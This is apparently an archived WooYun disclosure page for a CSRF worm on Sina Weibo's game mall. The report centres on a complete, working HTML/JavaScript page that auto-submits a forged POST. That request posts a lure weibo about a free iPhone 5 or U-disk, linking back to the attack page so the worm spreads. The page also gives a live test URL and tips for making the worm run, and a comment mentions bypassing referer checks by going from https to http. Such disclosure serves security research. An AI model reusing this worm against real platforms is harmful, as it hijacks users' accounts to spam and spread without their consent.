当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019648

漏洞标题:新浪微博首页蠕虫,可发微博主题

相关厂商:新浪

漏洞作者: fox

提交时间:2013-03-07 00:08

修复时间:2013-04-21 00:09

公开时间:2013-04-21 00:09

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-07: 细节已通知厂商并且等待厂商处理中
2013-03-07: 厂商已经确认,细节仅向厂商公开
2013-03-17: 细节向核心白帽子及相关领域专家公开
2013-03-27: 细节向普通白帽子公开
2013-04-06: 细节向实习白帽子公开
2013-04-21: 细节向公众公开

简要描述:

早上发了一个, 被忽略了,说是样例代码无法运行
好吧, 这次我把整个代码部署到SAE上了
另外SAE是测试啊, 可别把我封了

详细说明:

今天收到一个微游戏的广告, 说是积分兑换iphone5,眼馋啊

1.jpg


右边那个“分享得积分”没有做referer校验,并且会发布到首页,蠕虫就这么诞生了
想来是不可能给我iphone5作奖品啦, 这个新浪U盘造型不错,不如给两个当礼品吧:)
构造了一个简单的页面, 放在新浪的SAE上做测试

<html>
<body>
<form id="fox" name="fox" action="http://game.weibo.com/mall/task/ajaxShareGoods" method="POST">
<input type="text" id="id" name="id" value="80" />
<input type="text" id="text" name="content" value="%E6%88%91%E5%9C%A8%23%E5%BE%AE%E6%B8%B8%E6%88%8F%23%E9%87%8C%E6%8A%A2%E5%88%B0%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%E9%99%90%E9%87%8F%E7%89%88U%E7%9B%98%E4%BA%86%EF%BC%81%E9%A9%AC%E4%B8%8A%E5%85%8D%E8%B4%B9%E9%A2%86%E5%8F%96%EF%BC%9Ahttp%3A%2F%2F1.weigame.sinaapp.com%2Fiframe.html" />
<input type="submit" value="submit" />
</form>
<script>
var random=new Array();
var randomid=new Array();
random[0]="%E6%88%91%E5%9C%A8%23%E5%BE%AE%E6%B8%B8%E6%88%8F%23%E9%87%8C%E6%8A%A2%E5%88%B0%E6%96%B0%E6%B5%AA%E5%BE%AE%E5%8D%9A%E9%99%90%E9%87%8F%E7%89%88U%E7%9B%98%E4%BA%86%EF%BC%81%E9%A9%AC%E4%B8%8A%E5%85%8D%E8%B4%B9%E9%A2%86%E5%8F%96%EF%BC%9Ahttp%3A%2F%2F1.weigame.sinaapp.com%2Fiframe.html";
randomid[0]="80";
random[1]="%E7%A2%89%E5%A0%A1%E4%BA%86%EF%BC%81%E6%88%91%E5%9C%A8%23%E5%BE%AE%E6%B8%B8%E6%88%8F%23%E6%8A%A2%E5%88%B0iPhone+5%E5%95%A6%EF%BC%81+%E9%A9%AC%E4%B8%8A%E5%8E%BB%E6%8A%A2%EF%BC%9Ahttp%3A%2F%2F1.weigame.sinaapp.com%2Fiframe.html";
randomid[1]="70";
var num =parseInt(Math.random()*2);
document.getElementById('text').setAttribute("value", random[num]+"?rnd="+new Date().getTime());
document.getElementById('id').setAttribute("value", randomid[num]+"?rnd="+new Date().getTime());
document.fox.submit();
</script>
</body>
</html>


大家可以直接访问这个地址来测试

http://1.weigame.sinaapp.com/iframe.html?rnd=1362575759788


成功后, 会发布一条微博, 内容随机为抽iphone5或新浪U盘

2.jpg


小提示: 第一次进入微游戏积分商城的时候好像有个欢迎页面之类的东西,可能会阻碍蠕虫成功执行。 不过第二次以后就会成功蠕动起来了

漏洞证明:

2.jpg


SAE的日志

3.jpg

修复方案:

referer

版权声明:转载请注明来源 fox@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-03-07 09:47

厂商回复:

感谢提供,已安排人员进行修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-03-07 11:19 | fox ( 普通白帽子 | Rank:159 漏洞数:16 | fox)

    @新浪 礼物就求两个那种U盘吧亲~~

  2. 2013-03-07 11:57 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    看厂商回复,就知道从https提交http跳过referer的思路是可行的啊....学习了。哈哈哈哈~~~~

  3. 2013-03-07 14:10 | fox ( 普通白帽子 | Rank:159 漏洞数:16 | fox)

    @苏南同学 https到http我是根据RFC和网上资料得出的,倒是没有测试,惭愧了, 这里是另外一个洞